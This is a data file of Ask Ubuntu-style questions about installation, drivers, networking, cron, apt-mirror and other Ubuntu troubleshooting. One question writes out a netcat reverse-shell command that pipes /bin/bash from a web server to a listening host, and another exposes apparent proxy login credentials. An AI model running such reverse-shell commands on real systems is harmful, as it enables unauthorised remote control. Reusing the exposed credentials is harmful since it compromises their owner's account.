465193	14.04 pxe slow boot process ( udev/upstart/systemd )	i 've been using a diskless installation of ubuntu for our department up until ubuntu 13.04 , without any major issues so far . however , with 14.04 , something weird is happening in the boot process ( which takes several minutes to complete . ) looking at the dmesg log , it looks like the problem is related to the initialization of `` urandom '' and the `` nonblocking pool '' . any ideas why this would take several minutes when booting on the network ( using nfs ) ? extract from dmesg : [ 13.013388 ] pcnet32 0000:00:03.0 eth0 : link up , 100mbps , full-duplex [ 13.863447 ] random : init urandom read with 44 bits of entropy available [ 75.338950 ] random : nonblocking pool is initialized [ 115.543026 ] init : plymouth-upstart-bridge main process ( 139 ) terminated with status 1 [ 115.551323 ] init : plymouth-upstart-bridge main process ended , respawning [ 155.826797 ] init : plymouth-upstart-bridge main process ( 149 ) terminated with status 1 [ 155.827871 ] init : plymouth-upstart-bridge main process ended , respawning [ 155.863568 ] init : plymouth-upstart-bridge main process ( 152 ) terminated with status 1 [ 155.865184 ] init : plymouth-upstart-bridge main process ended , respawning [ 155.884975 ] init : plymouth-upstart-bridge main process ( 156 ) terminated with status 1 [ 155.886498 ] init : plymouth-upstart-bridge main process ended , respawning [ 158.202482 ] systemd-udevd [ 320 ] : starting version 204 it was suggested that /dev/random and /dev/urandom were missing and had to be recreated , but this was not the solution . i would be very grateful for any hint that would point me in a direction to help me solve this issue . update 2014-05-20 -- here is the included bootchart :
465194	how to disable screen lock in ubuntu 14.04 / unity ?	i disabled the lock in the `` brightness & lock '' but i still get the lock screen when is resumes/wake from suspend . although the option `` require my password when waking from suspend '' is unchecked
465198	how do i temporarily remove proxy settings ?	i set my proxy settings using the following command export http_proxy=http : //proxyusername : proxypassword @ proxyaddress : proxyport when i do echo $ http_proxy i get http : //cavs @ students : cavsuon @ proxy.uonbi.ac.ke:80 however when i do unset $ http_proxy i get an error -bash : unset : `http : //cavs @ students : cavsuon @ proxy.uonbi.ac.ke:80 ' : not a valid identifier so i did $ http_proxy = `` '' which also gives me the following error -bash : http : //cavs @ students : cavsuon @ proxy.uonbi.ac.ke:80 : no such file or directory how do i completely remove this proxy setting ?
465204	is network-manager responsible for regaining internet connection after losing and regaining wi-fi connectivity ?	when i bring my ubuntu machine into an elevator , it loses wi-fi connectivity briefly . when i bring it back out , it is unable to regain internet connection . why could this be the case ? is network-manager responsible for regaining internet connection ( and what exactly does network-manager do ) ? here are some details : because this machine is running ros ( the robot operating system ) , it is configured to have a static ip . in other words , /etc/network/interfaces looks like : auto wlan0 iface wlan0 inet static address ... netmask ... network ... broadcast ... gateway ... dns-nameservers ... wireless-essid ... and /etc/networkmanager/networkmanager.conf is configured such that : managed=true after the ubuntu machine exits the elevator , when i type `` iwconfig '' , i see that wlan0 is connected to an access point with reasonable link quality and signal level , however i can not ping any website from the ubuntu machine , and i can not ssh into the ubuntu machine from another machine . what is going on and why would this be the case ? i have also disabled networkmanager just to see what would happen . in this case , upon exiting the elevator , when i type `` iwconfig '' , i see that wlan0 is not connected to any access points or wireless networks . however , i can type `` sudo ifdown wlan0 & & sudo ifup wlan0 '' to regain internet connection . thanks !
465207	alt+tab , switching between applications in 14.04	apparently this function has been lost with the new update to 14.04 . i write as an end user who relies on this function to limit pain from wrist rsi . has this been replaced with a new keyboard short cut ? i really hope so as this will seriously impact my life in a negative way otherwise !
465208	how to enable horizontal mouse wheel scrolling in unity ?	i 've read a few related questions : enable horizontal scrolling in ubuntu http : //ubuntuforums.org/showthread.php ? t=2097030 but has n't given me the answer . just plugged in a mouse in 12.04 and there 's no horizontal scrolling with the mousewheel . instead it has strange behaviour where text is changed if mousewheel is held down and moved over it . hp mouse , feature works on windows 7 .
465216	unity launcher icon edges disappeared in 14.04	for a couple of days my unity in ubuntu 14.04 has been acting weird . the icon borders in the launcher have disappeared and the indicators are acting strange as well ( blocks instead of arrows ) . all of this is independent of the icon/gtk/window theme in use . i already reset unity using this tutorial , but to no avail . here is a picture of what is happening : i have honestly no idea what might be causing this . the only thing i know is that it happened a few days ago when i forcefully shut down my laptop after a failed file transfer that had absolutely nothing to do with unity or the os itself .
465217	unable to locate package libpng12 while installing icinga	i am trying to install icinga on my ubuntu machine . i am following the quick start guide for doing the installation . when i run the command apt-get install libjpeg62 libjpeg62-dev libpng12 libpng12-dev i am getting an error message as : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libpng12 also when i run the command apt-get install snmp libsnmp5-dev i am geting error as : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libsnmp5-dev i am new to using ubuntu and icinga , i am not able to find where i have done mistake . please help me in this . also i followed this site to install any missing compilers and ran the commands given in the site : $ sudo apt-get update $ sudo apt-get upgrade $ sudo apt-get install build-essential $ gcc -v $ make -v but even after running the commands i am seeing same error messages .
465218	trusty images for openstack	i 'm in the prozess of creating trusty images for openstack . what i have noticed is that the net-install with preseed creates an image of 1.9 gb . i just need a vm with openssh . is it possible to create a small vm . i have issues passing the cloud-init option too . how do i disable the firewall ? what am i doing wrong . -- snip -- d-i netcfg/choose_interface select eth0 d-i netcfg/get_nameservers string d-i netcfg/get_ipaddress string d-i netcfg/get_netmask string 255.255.255.0 d-i netcfg/get_gateway string d-i netcfg/confirm_static boolean true d-i netcfg/get_hostname string vhost d-i netcfg/get_domain string vdomain d-i netcfg/dhcp_hostname string vdomain d-i netcfg/wireless_wep string d-i ufw/enable boolean false d-i debian-installer/locale string en_us d-i debian-installer/splash boolean false d-i clock-setup/ntp boolean true d-i clock-setup/ntp-server string pool.ntp.org d-i finish-install/reboot_in_progress note d-i cdrom-detect/eject boolean true d-i debian-installer/exit/halt boolean false d-i debian-installer/exit/poweroff boolean false d-i mirror/country string germany d-i mirror/http/mirror string de.archive.ubuntu.com d-i mirror/http/directory string /ubuntu/ d-i mirror/http/proxy string http : //proxy:8080 d-i apt-setup/backports boolean true d-i apt-setup/contrib boolean true d-i apt-setup/multiverse boolean true d-i apt-setup/non-free boolean true d-i apt-setup/proposed boolean true d-i apt-setup/universe boolean true d-i apt-setup/universe/source boolean true d-i apt-setup/services-select multiselect security d-i apt-setup/security_host string security.ubuntu.com d-i apt-setup/security_path string /ubuntu d-i base-installer/install-recommends boolean false d-i pkgsel/update-policy select none debconf debconf/priority select critical debconf debconf/frontend select readline d-i partman-auto/purge_lvm_from_device boolean true d-i partman-basicfilesystems/no_swap boolean false d-i partman-auto/disk string /dev/sda d-i partman-auto/method string regular d-i partman-lvm/purge_lvm_from_device boolean true d-i partman-lvm/device_remove_lvm boolean true d-i partman-md/device_remove_md boolean true d-i partman-auto/choose_recipe select atomic d-i partman-auto/expert_recipe string \ boot-root : : \ 6100 50 10000000 ext4 \ $ primary { } $ bootable { } \ method { format } format { } \ use_filesystem { } filesystem { ext4 } \ mountpoint { / } \ . d-i partman/confirm_write_new_label boolean true d-i partman/choose_partition select finish d-i partman/confirm boolean true d-i partman/confirm_nooverwrite boolean true d-i partman/mount_style select traditional d-i lilo-installer/skip boolean true d-i grub-installer/grub2_instead_of_grub_legacy boolean false d-i debian-installer/add-kernel-opts string d-i grub-installer/only_debian boolean false d-i grub-installer/with_other_os boolean false d-i grub-installer/bootdev string ( hd0,0 ) d-i grub-pc/install_devices multiselect /dev/sda d-i console-setup/ask_detect boolean false d-i console-setup/layoutcode string us d-i console-keymaps-at/keymap select us d-i console-setup/variantcode string d-i clock-setup/utc boolean true d-i time/zone string europe/berlin d-i user-setup/allow-password-weak boolean true d-i user-setup/password-weak boolean true d-i user-setup/encrypt-home boolean false d-i passwd/root-login boolean false d-i passwd/make-user boolean true d-i passwd/user-fullname string ubuntu server administrator d-i passwd/username string misadm d-i passwd/user-password-crypted password somehash d-i pkgsel/include string cryptsetup openssh-server localepurge tmpreaper rsync curl less wget screen elinks openssh-client cloud-init cloud-utils cloud-initramfs-growroot d-i pkgsel/upgrade select none localepurge localepurge/nopurge multiselect en_us localepurge localepurge/none_selected boolean false localepurge localepurge/mandelete boolean true localepurge localepurge/remove_no note localepurge localepurge/dontbothernew boolean false localepurge localepurge/verbose boolean false localepurge localepurge/showfreedspace boolean true localepurge localepurge/quickndirtycalc boolean true tmpreaper tmpreaper/tmpreaper_time note tmpreaper tmpreaper/confignowexists note tmpreaper tmpreaper/readsecurity note tmpreaper tmpreaper/readsecurity_upgrading note cloud-init cloud-init/datasources multiselect cloudstack d-i preseed/late_command string \ wget -o /target/var/tmp/post.sh ftp : //srv01.tt.de/ubuntu/post.sh ; \ wget -o /target/etc/default/grub ftp : //srv01.tt.de/ubuntu/grub ; \ chmod +x /target/var/tmp/post.sh ; \ chroot /target/ bash /var/tmp/post.sh > /root/preseed-post.log 2 > & 1
465221	problem with the visualization of ubuntu 14.04 in virtual machine	i update my ubuntu version to the 14.04 in the virtual machine ( oracle vm virtal box ) on windows 8 . now i 've got a problem : the size of ubuntu window is really small and i 'm not able to enlarged it ! more over , the window is not centered , so i 'm not able to see all ubuntu desktop . could someone help me ? thanks
465223	download from ubuntu apps directory	i am trying to download gimp from ubuntu apps directory . when i click on download it opens a windows launch application window . what do i have to do for that ? do i need to download an application for this application .
465228	not alt + tab to find my window	sometimes i open more than seven or eight window . majority of this situation one of them is terminal . also you know that we need terminal during work . so i do not like to press alt + tab and after that skip to gain my own window . how many times i should do this ! ! for an important window like terminal which i need that repeatedly . so i need any key switch which bring terminal for me not alt + ctrl + t , that one open new terminal . i need my own current terminal . any way you suggest ?
465230	how to download icinga and its plugins in ubuntu	i am trying to install icinga software on my ubuntu machine . i am following the quick start guide and got stuck at step that says : 2.3.5 . download icinga and the plugins . change to your local source directory i.e . /usr/src # > cd /usr/src get the current source from the icinga website . do n't forget to download the monitoring plugins . i have downloaded the icinga core from icinga website and the downloaded file is saved to my downloads directory path . i am new to using ubuntu and also icinga so please help me how can i install this software . also when i go to monitoring plugins download page then i can see a link to download the nagios plugin but not for icinga . how can i install the monitoring plugins , please help ?
465235	'__fdelt ' and '__fdmask ' not declared in this scope ( posix_types.h not included )	i 'm running ubuntu 12.04 lts , 64bit version . i 'm getting the following error when compiling a c++ program : ../elements/userlevel/socket.cc:477 : error : '__fdelt ' was not declared in this scope ../elements/userlevel/socket.cc:477 : error : '__fdmask ' was not declared in this scope i am using llvm-gcc : using built-in specs . target : x86_64-unknown-linux-gnu configured with : /home/duncan/llvm-2.9/64/llvmgcc42-2.9-release.src/configure -- prefix=/home/duncan/llvm-2.9/64/phase2/release/llvmgcc42-2.9-release.install -- program-prefix=llvm- -- enable-llvm=/home/duncan/llvm-2.9/64/phase2/release/llvmcore-2.9-release.obj -- enable-languages=c , c++ , fortran thread model : posix gcc version 4.2.1 ( based on apple inc. build 5658 ) ( llvm build 2.9 ) i recon there 's something wrong with my include path , but i ca n't figure out what . since both those macros belong to posix_types.h and this file exists on my machine , what can the problem be ? thanks !
465237	installing commerce kickstart into ubuntu 12.04	hi iam newbie at this and maybe from question it will be obvious . i would like to install drupal commerce kickstart into virtual box guest ubuntu 12.04 via drush or by any other method . i have searched long and wide , but have yet to find any information as to how to install on ubuntu or other linux distros . it s seem all installation methods are for windows and osx . any information or direction will be greatly appreciated . thanks so much ! oscar
465243	how to use fglrx proprietary driver for dual ati radeon hd 5670 crossfirex in ubuntu 14.04 ?	i have tried to use fglrx proprietary driver for ati radeon hd 5670 in ubuntu 14.04 but when i install it ( using either apt-get or the `` additional drivers '' tab in `` software & updates '' application ) i get a blank screen in the next reboot instead of the login screen . i have 2 gpus working in `` dual '' mode ( crossfire ) . i have tried both fglrx and fglrx-updates with the same result for both . i followed all the steps in the help wiki but same problem persists . output of grep `` ] ( ee ) '' /var/log/xorg.0.log : [ 10.550 ] ( ee ) open /dev/dri/card0 : no such file or directory [ 10.769 ] ( ee ) aiglx error : failed to open /usr/x11r6/lib64/modules/dri/fglrx_dri.so , error [ /usr/x11r6/lib64/modules/dri/fglrx_dri.so : can not open shared object file : no such file or directory ] [ 10.769 ] ( ee ) aiglx error : failed to open /usr/lib64/dri/fglrx_dri.so , error [ /usr/lib64/dri/fglrx_dri.so : can not open shared object file : no such file or directory ] [ 10.769 ] ( ee ) aiglx error : failed to open /usr/x11r6/lib/modules/dri/fglrx_dri.so , error [ /usr/x11r6/lib/modules/dri/fglrx_dri.so : can not open shared object file : no such file or directory ] i also tried : setting nomodeset parameter at boot ln -s /usr/lib /usr/lib64 but problem persists .
465245	is there any software for converting my jar into a .deb file ?	i have my .jar file.i want to convert it into .deb file . is there any software for this ? please dont give comments like ... ..you can execute a jar straight away by giving `` java -jar io.jar '' . i need to know about the software which converts a jar or some other file in to a ubuntu exetuble .
465247	virtualbox windows 8.1 usb issue	i 'm using oracle vm virtualbox manager 4.3.10_ubuntu as a virtualization solution . i 've installed windows 8.1 x64 for some usb devices that linux does not have compatible software ( polar pro training 5 ) . at first i could not see any actions when selected on virtualbox side . after adding my username with sudo adduser yourusername vboxusers command windows recognized all usb devices plugged in . but at the `` device manager '' tab , there is a exclamation mark . although windows try to install drivers for the usb nothing happens . this occur for all usb devices . here is screen shots of my device manager . windows side : ubuntu virtualbox parameters :
465252	unity academic lens ?	i found this old article to add an academic lens to unity . i thought the idea was great , gave it a try , but it does not work . e : unable to locate package unity-lens-academic e : unable to locate package unity-scope-jstor e : unable to locate package unity-scope-pubmed e : unable to locate package unity-scope-scholar e : unable to locate package unity-scope-sciencedirect is there a similar project out there ? thanks ! ps : i 'm running ubuntu 14.04 64bits
465253	pcie umts adapters known to work with ubuntu ?	i am looking for an internal pcie umts card that will work flawlessly with ubuntu , that is : require no software to run other than what can be installed with apt from the standard ubuntu repos work reliably , without any major stability issues . i have used a huawei usb stick as well as an option expressport adapter , both of which were plug-and-play and worked reliably – were it not for the fact that they are additional external devices to carry around . i have also tried two pcie cards : one is a hp gobi 2000 , which will not be recognized without providing a firmware blob ( which needs to be extracted from the windows driver package and placed somewhere in the filesystem ) – which is a major hack operation and thus violates # 1 . the other is an ericsson f5521gw , which is recognized instantly and requires no more than entering basic network parameters to connect – but will at some point go into sleep mode and never wake up again , thus violating # 2 . does anyone know of a list of pcie umts adapters known to work with ubuntu or debian , or have positive experience with a particular model ? edit : i found https : //wiki.ubuntu.com/networkmanager/hardware/3g , but it appears somewhat unclear as to what works out of the box and what requires hacking . edit 2 : pfsense has a list of 3g/4g modems known to work . pfsense is bsd-based , thus the list is of limited relevance to linux . however , devices on the list are likely to have a free driver for a non-linux os , which in turn makes it likely that a linux driver is also available for these devices ( or will be at some point ) . however , the hp 2300 is also on the list , despite the fact that it requires a firmware download on startup , just like its successor , the un2400 ( =gobi 2000 ) .
465259	cups with ubuntu 14.04 very slow	i run ubuntu 12.04 on my laptop and i recently installed ubuntu 14.04 on my desktop . i have cups installed to connect to the printer server at my work place . on both systems i see all the printers but on ubuntu 14.04 lpstat -p takes almost one minute and the same is true when i try to print from libreoffice or okular , amazingly the response from gimp is extremely fast . the response on my laptop is very fast . i really do n't know what to do . can you help ?
465266	problems with games on-line in ubuntu 14.04 lts	i am using ubuntu 14.04 lts , and used to play games that now suddenly i can not play , those games are : legend on line and league of angels via facebook games . before install 14.04 lts i can play these games , but now no . with another games via facebook , i have not any problem , i would like to solve this little trance thanks in advance to all alfil bermello
465268	how to play video on www.mbcradio.tv on ubuntu 12.04 lts	ca n't play video from www.mbcradio.tv . ask for plug-in . ca n't find the plug in listed.please help me how to play video from this site .
465269	need help opening .run on my xp partition	so i downloaded planeshift and it 's in my windows part of the hard so how do i install it ? .- . btw i have no space for a 1gb file in my linux parition
465273	gtk module can only sometimes be found	when i try to install vmware workstation on ubuntu 14.04 i get the following warnings : ( vmware-installer.py ) : gtk-warning ** : unable to locate theme engine in module_path : `` murrine '' gtk-message : failed to load module `` canberra-gtk-module '' : libcanberra-gtk-module.so : can not open shared object file : no such file or directory when i ignore those and install anyway , the warnings reoccurs when running the vmplayer gtk-message : failed to load module `` canberra-gtk-module '' i googled it and a lot of suggestions were made to install some packages , which i did libcanberra-gtk-module libcanberra-gtk-module : i386 libcanberra-gtk3-module : i386 libcanberra-gtk3-module all possible versions are available now ( note that i needed to run 'sudo updatedb ' for locate and vmplayer to find them ) user @ machine : ~/desktop $ locate libcanberra-gtk-module.so /usr/lib/i386-linux-gnu/gtk-2.0/modules/libcanberra-gtk-module.so /usr/lib/i386-linux-gnu/gtk-3.0/modules/libcanberra-gtk-module.so /usr/lib/x86_64-linux-gnu/gtk-2.0/modules/libcanberra-gtk-module.so /usr/lib/x86_64-linux-gnu/gtk-3.0/modules/libcanberra-gtk-module.so after installing 'libcanberra-gtk-module ' ( gtk-2.0 64bit version ) the vmplayer command found the module , but the installer still ca n't find it . should i worry ? or just ignore since i will probably never use that installer again ? also how come it finds the module in the one case , but not in the other ?
465281	remove extra noise from ffmpeg video	i am using the following command to record the audio and video : ffmpeg -loglevel warning -y -f v4l2 -s 544x288 -i /dev/video0 -vstats -vstats_file '/home/2014-05-13t07-18-37/left_cam-stats ' -f pulse -name 'unknown source 0 ' -i alsa_input.pci-0000_00_1b.0.analog-stereo -filter lowpass -f pulse -name 'left_mic 0 ' -i alsa_input.usb-046d_0823_d81a0330-00-u0x46d0x823_1.analog-stereo -f pulse -name 'right_mic 1 ' -i alsa_input.usb-046d_0823_4b709030-00-u0x46d0x823.analog-stereo -f pulse -name 'default 0 ' -i default -f mpegts -crf 20 -r 24 -pix_fmt yuv420p -vcodec libx264 -vprofile baseline -t 02:00:00 -map 0:0 -map 1:0 -map 2:0 -map 3:0 -map 4:0 /home/left_cam.mp4 it record both audio and video from different devices . but the audio comes with the horrible noise ( feed back ) . i want to remove that noise form the recording . is there any way to solve this problem ?
465283	evolution mail signature inline/attached images	can somebody tell me how i can insert an image in evolution mail signatures ? i currently have a signature , but it 's always attached to the email . can i make it inline ? and is it possible to use a base64 image string ? if anybody replies to my email the images get lost . only the name between brackets remains .
465284	how to execute livestreamer command with cron ?	so the other day i installed ubuntu 14.04 lts at home in a partition next to windows 7 . as i 'm not able to be at home to watch the sailplane grand prix live as streamed on youtube , i decided to use livestreamer ( http : //livestreamer.readthedocs.org/en/latest/ ) to save it to a file using its -o option . this works fine ( i think - test is running today and i 'll see what it looks like when i get home tonight ) except that i have to start the command before leaving home in the morning , and the broadcast only starts around mid day , leading to some wasted bandwidth in the morning . so the obvious thing is to use cron to schedule it , right ? only , when running it from cron it never creates the output file . the cron line i use is this : 38 23 13 05 * ./getfaisgpstream 2 > /home/me/getfaisgpstream.log like i say , the time comes and goes , and the file /home/me/faisgp20140513 does not appear like it does when running livestreamer from the terminal . i know about the issue where crontab lines need to end in a newline , and i purposefully left a blank line at the bottom of the file to cater for that . i used crontab -e to change the cron file . the output i get in `` getfaisgpstream.log '' is : ./getfaisgpstream : 6 : ./getfaisgpstream : livestreamer : not found the contents of the file `` ./getfaisgpstream '' is : echo echo ======= livestreamer script running to get fai sgp 2014 stream and save it in home : [ `date` ] echo while true ; do livestreamer -- hds-timeout 300 -- hls-timeout 300 -- rtmp-timeout 300 -- http-timeout 300 -- http-stream-timeout 300 -fo /home/me/videos/faisgp`date + % y % m % d` http : //www.youtube.com/watch ? v=xmy5vhavnmg best echo ======= livestreamer terminated , restarting [ `date` ] echo ; done echo echo ======= livestreamer script exiting [ `date` ] echo and yes this makes it too robust - but whatever , i 'm after a simple hack right now that will solve this for recording the broadcast tomorrow .
465285	run last command with all the letters transformed to lowercase	many times i have run a command with all the letters in uppercase ( maybe because capslock was on ) , and i pressed enter before realising this . how can i run the last command with all the letters transformed to lowercase ?
465287	music player with good library support	i need a music player with good support for managing large music libraries . one particular feature that i need is support for multiple artists per track . i tried quod libet , because i heard it supported multiple artists , but it really does n't . the artists listing shows artist1/artist2 ( which should be two separate artists ) as a single artist , which is n't what i want . the same issue happens with multiple genres . what are the alternatives ? or perhaps is there a plugin for some player like rhythmbox that supports multiple artists/genres ?
465288	launcher duplicate iconless icon	as from the screenshot below , there is a duplicate icon of the xfig program . sometimes with different programs same thing happens . any ideas how to solve this ?
465289	after unlocking ubuntu after an extended period of idle time , why do my open applications disappear ?	my use case is this : i am running ubuntu 12.04 guest on vmware workstation 8.0.4 windows 7 host . i work all day and before i go home for the day i start some long-running processes . usually , i have eclipse and a few terminator windows open at a minimum . when i show up at work the next day , the screen is locked on the ubuntu guest . my current settings are lock after 10 minutes and suspend is never invoked . just before the lock screen appears ( as my host display is turned off as well ) i see an outline of what looks like my screen before i left the last day for a brief moment . i then log in to my ubuntu guest and all my applications are gone , even though i saw them in a brief flash moments earlier . i am presented with a desktop , but no running programs that i had started the day before . what happened to these applications and how do i prevent this from happening in the future ? i do n't fancy turning off lock really if possible , i would rather keep that on .
465290	uninstall application installed using .sh file	i installed an application using a .sh file which i want to uninstall . i tried uninstalling using the software centre but i do n't find the application there . how do i uninstall this software ?
465294	i ca n't suspend , hibernate or shutdown my 14.04 system without problems on restarting . what 's up ?	i 've upgraded my dell studio 1735 from 12.04 to 14.04 and it 's now a pain to use . if i suspend , i get a blank screen on restarting ; hibernate seems to have been removed from this update and my efforts to get it back have so far failed . when i shut down and reboot i get no less than 7 popups informing me of system problems . these problems appear to have been around since 2012 but there seems little attention to it apart from workarounds . since there were no obvious instructions about whether or how to update from the old lts i made a mistake and had to do 3 updates to get to the new one . why someone did n't say on the front page of the update that lts upgrade was n't recommended before july i do n't know . my system was sick before i upgraded and i naively thought it would improve . on the whole it has , but it 's a pain to reboot every session . for info , i 'm using a 32-bit system with an intel corporation mobile gm965/gl960 integrated graphics controller . is there any hope of improving this system ?
465295	ubuntu 13.4 upgrade download website ubuntu	i have ubuntu 13.4 i would like to upgrade this where can i find a patch ? google has nothing , can not find anything on your website . greetings , fabrizio
465297	how to make the port free ; already used by drupal ?	i am attempting to install drupal 7 as a localhost on a machine running ubuntu 14.04 and also have tomcat 7.0.53 loaded for another program . how would i go about changing the port used by drupal , since tomcat is using port 8080 ?
465302	dd will not recognise my sdcard ie `` no such file or directory '' it is seen by all other routes gparted , df , lsusb , blkid , , , so on	xubuntu 12.04-32 i am trying to build a bootable sdcard for my tablet and everything is ready but `` dd '' will not recognise any of my sdcard ( s ) 2gb micro sd,8gb or 32gb
465303	apt-mirror -error ?	i have successfully set up an ubuntu repository for 14.04 locally using apt-mirror . but at the first in the sources.list i have given deb-amd64 to download 64-bit repository and after completing it i just added another set of deb repositories ( say deb-i386 ) for downloading 32-bit . i stopped it in the middle way because i donât wish to mirror 32-bit repositories . after that i ran clean.sh and that removed 32-bit files . now when i give sudo apt-get update while using lan repositories it gets successfully updates and in between it shows error that it can not fetch binary i386 files . error as follows : err http : // < lanip > trusty/main i386 packages 404 not found err http : // < lanip > trusty/restricted i386 packages 404 not found w : failed to fetch http : // < lanip > /ubuntu/dists/trusty/main/binary-i386/packages 404 not found w : failed to fetch http : // < lanip > /ubuntu/dists/trusty/restricted/binary-i386/packages 404 not found w : failed to fetch http : // < lanip > /ubuntu/dists/trusty/universe/binary-i386/ my apt-mirror list is as follows : # # # # # # # # # # # # # config # # # # # # # # # # # # # # # # # # set base_path /data/ubuntu_repository/trusty_repo set nthreads 20 set _tilde 0 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # trusty 64bit mirror deb-amd64 http : //in.archive.ubuntu.com/ubuntu trusty main restricted universe multiverse deb-amd64 http : //in.archive.ubuntu.com/ubuntu trusty-security main restricted universe multiverse deb-amd64 http : //in.archive.ubuntu.com/ubuntu trusty-updates main restricted universe multiverse deb-amd64 http : //in.archive.ubuntu.com/ubuntu trusty-proposed main restricted universe multiverse deb-amd64 http : //in.archive.ubuntu.com/ubuntu trusty-backports main restricted universe multiverse # # # # # # ubuntu partner repo deb-amd64 http : //archive.canonical.com/ubuntu trusty partner # # # # # # ubuntu extras repo deb-amd64 http : //extras.ubuntu.com/ubuntu trusty main clean http : //archive.ubuntu.com/ubuntu clean http : //security.ubuntu.com/ubuntu clean http : //archive.canonical.com/ubuntu
465304	laptop will not boot after attempting upgrade to 13.10	i wanted to update my os to the new 14.04 lts . i was running 12.04 lts before and followed the advice that upgrades should be done in steps . i first upgraded to 12.10 , which seemed to work fine , and later to 13.10 . this was all done through the software manager . after the last upgrade , i am no longer able to boot up my computer . the gnu grub menu opens up , but after selecting ubuntu , it just stalls with a blank purple screen . if i select one of the other kernels , it also stalls after `` loading initial ramdisk ... '' . i ca n't get into the recovery menu , either . i 'm still rather new to linux and may have possibly made the situation worse . unfortunately , nothing has worked yet . i tried reinstalling from a flash drive and on my first attempt , the wizard recognised a previous installation . unfortunately , the wizard also did n't like how my partitions were set up ( i did n't change anything ) and gave an error before closing . unfortunately , i did n't write the error down , but it was about the boot partition . on the next attempt and ever since , the installation wizard has stated that '' this computer currently has no detected operating systems . '' this is strange , because i could see the disk and even access my files when booting up from the usb . at this point , i decided to back up my important files using dropbox . before losing all my files , i wanted to try the boot-repair tool , which also produced no results , and the files are no longer visible when booting from usb . the link to the boot-repair log is at http : //paste.ubuntu.com/7457249/ . if i then proceed through to the `` something else '' installation option , i can see that the partitions still exist . this is what they look like : /dev/sda free space ( size indicated 1mb ) /dev/sda1 efi ( 33mb of 98 mb used ) /dev/sda2 efi ( 352634mb of 746330mb used ) /dev/sda3 swap ( 3725mb , none used ) free space ( 0mb ) is there any way i might be able to get my computer to work and preserve my files as well ?
465305	on startup [ number ] kvm : disabled by bios	when i start ubuntu 12.04 it says [ number ] kvm : disabled by bios . how can i fix it ? also there is a quick black screen flash on shutdown which states unable to run [ something ] . it flashes too fast so i can not really read it . i think that it is normal , i just wanted to check in case if it means something bad : / thank you for your time . ps i am sorry for my english .
465309	arm toolchain with eclipse arm plugin	i need to program the stmfx boards on my ubuntu pc , can someone address me to a working tutorial explaining the eclipse arm plugin with the correct toolchain ? i 've tried many configuration but i stuck during the project configuration when eclipse asks where to find the toolchain , do you know where is located after i do : sudo apt-get install gcc-arm-linux-gnueabi g++-arm-linux-gnueabi thanks for the reply
465311	unable to install ntfs-config	i have recently installed ubuntu 14.04 lts . i ran the command sudo apt-get install ntfs-config , but it displays the following line : unable to locate package ntfs-config what should i do now to install this ?
465312	why is netcat remote shell not returning any output on ubuntu 12.04 ?	i 'm connecting to a server i have on my laptop , both are on the same vmnet and both systems are ubuntu 12.04 lts . in order to connect i use reverse shell from the web sever . first i start listening on my host by typing sudo nc -l -k -v 10101 and then i start the listen by going to my webserver and typing /bin/nc 172.16.55.1 10101 /bin/bash on the host end i get a notification saying connection from 172.16.55.128 port 10101 [ tcp/* ] accepted after this , instead of having a working connection ( i.e write ls in host and getting my web-server 's output ) i get nothing in my host , and in my web server i can see the same input i wrote from the host ( i.e all i see appear is ls ) from past experience when i used remote shell my host changed from me @ host : ~ $ to something else indicating i 'm now in a remote system for example me @ remotewebserver : ~ $ here this is not the case , i have nothing before the part where i type , not even the me @ host that was there .
465313	ubuntu 13.10 now 12.04	several months ago i had someone install 13.10 on my laptop . for the last few weeks my laptop is running slow on boot up and i see that i am running 12.04 . is it possible it rolled back on its own or did i do something to cause it ? how can i get 13.10 back ?
465315	i do n't know how to navigate genymotion in the terminal	i have downloaded the genymotion-2.2.0_x86.bin but dont know how to go by it.please help . when i run the chmod +x command line it tells me `` no command found '' and that no genymotion directory found
465316	ubuntu theme changed	i changed my ubuntu theme a few days ago and it worked perfectly . it is meditaranean or something like that.. a gtk theme . then i wanted to change my cursor theme , and that worked aswell ( although i did quite a mess in the files from the icons folder ) . i also put on an icon theme and it worked , but now when i restarted my pc several days after it 's a combination of ambiance and my theme . the apps look like my theme , and nautilus looks like ambiance . the icon pack has been removed completely aswell . only my mouse works now . what can i do to repair that ? : ( i tried logging out ... back on.. restarting .
465318	creating a linux executable file from a bunch of files/directories	i have a directory , with a small scructure : script.sh dist/ dist/program.jar log/ log/error.log conf/ conf/program.conf the script.sh do some checks , and start program.jar with a lot of parameters . there 's a way to encapsulate all this structure in a single file ( like the directory.app executables in osx ) , and made this file a executable ?
465321	will i loose data or software when upgrading the kernel and/or os version ?	i have a doubt . i 'm using ubuntu 13.10 . if i change my kernel version , will any data be lost ? i 've installed some software packages , will those still be present after updating my kernel ? and the same question for upgrading to a new os ( 14.04 ) . will any data or software be lost if i upgrade to 14.04 ?
465322	integrated ati mobility radeon x300 linux driver	i have a old hp compaq nx6125 laptop with amd turion 64 , running lubuntu linux the graphics is a integrated ati mobility radeon x300 i have very low resulotion about 800x600 can you help me locate the apropriate driver for this card please .. thank you antonio roque
465323	unable to build gtk+ 3	i am getting started with open source contributions and need to make-build the gnome-calculator . i recently downloaded gnome 3 ( ubuntu ) and need to build the gnome-calculator which needs gtk+3 . i downloaded gtk+-3.12.0.tar.xz from this site : http : //www.gtk.org/download/linux.php after running ./configure -- prefix=/opt/gtk , i get the following problem : http : //fpaste.org/101402/ however , package atk could not be located . edit installing it from the repositories gives an older version that is not compatible with gnome-calculator ... i need to install the specific version only .
465327	superblock error	here 's what i did : i wanted to reinstall the system so i ran ubuntu live cd , started to resize my hdd partition and suddenly everything crashed , the black display appeard . then thought that i should't reset the computer to let it resize my hdd until it finished . so i did so , after few hours i ran it again and tried to mount the partition error mounting /dev/sda5 at /media/karol/muq : command-line `mount -t `` ext4 '' -o `` uhelper=udisks2 , nodev , nosuid '' `` /dev/sda5 '' `` /media/karol/muq '' ' exited with non-zero exit status 32 : mount : wrong fs type , bad option , bad superblock on /dev/sda5 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so so ... what should i do now ? there are very important data to me so i ca n't just format it . thanks !
